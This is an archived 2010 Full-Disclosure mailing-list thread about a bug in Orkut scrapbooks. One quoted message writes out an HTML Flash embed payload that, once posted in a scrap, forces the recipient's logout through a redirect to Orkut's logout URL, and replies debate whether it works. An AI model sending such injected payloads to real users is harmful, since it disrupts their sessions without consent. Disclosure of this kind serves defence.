lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Sun, 13 Jun 2010 19:08:13 -0300
From: "M.B.Jr." <marcio.barbado@...il.com>
To: "Fabio N Sarmento [ Gmail ]" <fabior2@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Orkut Signout via scrap

It works in the old version orkut.


On Sat, Jun 12, 2010 at 2:52 PM, Fabio N Sarmento [ Gmail ]
<fabior2@...il.com> wrote:
>
> Good find, but it seems it doens't Logout , it's only keep refreshing the
> page.
>
> @fabiaum
>
>
> 2010/6/12 ㅤ ㅤRockey <skg102@...il.com>
>>
>> Hello,
>>
>> There is a small bug in orkut scrapbook that if any one sends a scrp
>> containing the following code
>>
>> <div class="para">
>> <embed type="application/x-shockwave-flash"
>>
>> src="promote.orkut.co.in/redirect?u=http://www.orkut.co.in/GLogin?cmd=logout"
>> style="" id="979482838" name="979482838" bgcolor="#FFFFFF"
>> quality="autohigh" wmode="transparent" allownetworking="internal"
>> allowscriptaccess="never" height="1" width="1">
>>
>> Then the recipient will logout automatically from the orkut.
>>
>> Same thing occurred to me while I was browsing and mail was sent to me
>> from my friend Nikhil and In case same thing occurs with you then you
>> should try to delete that scrap on next login and In case you are
>> unable to do that then you can simply disable flash then you will be
>> able to delete that scrap.
>>
>> Cheers,
>> Rockey Killer
>>
>>
>> --
>> It's all about Hacking and Security
>>
>> http://h4ck3r.in/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



Marcio Barbado, Jr.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ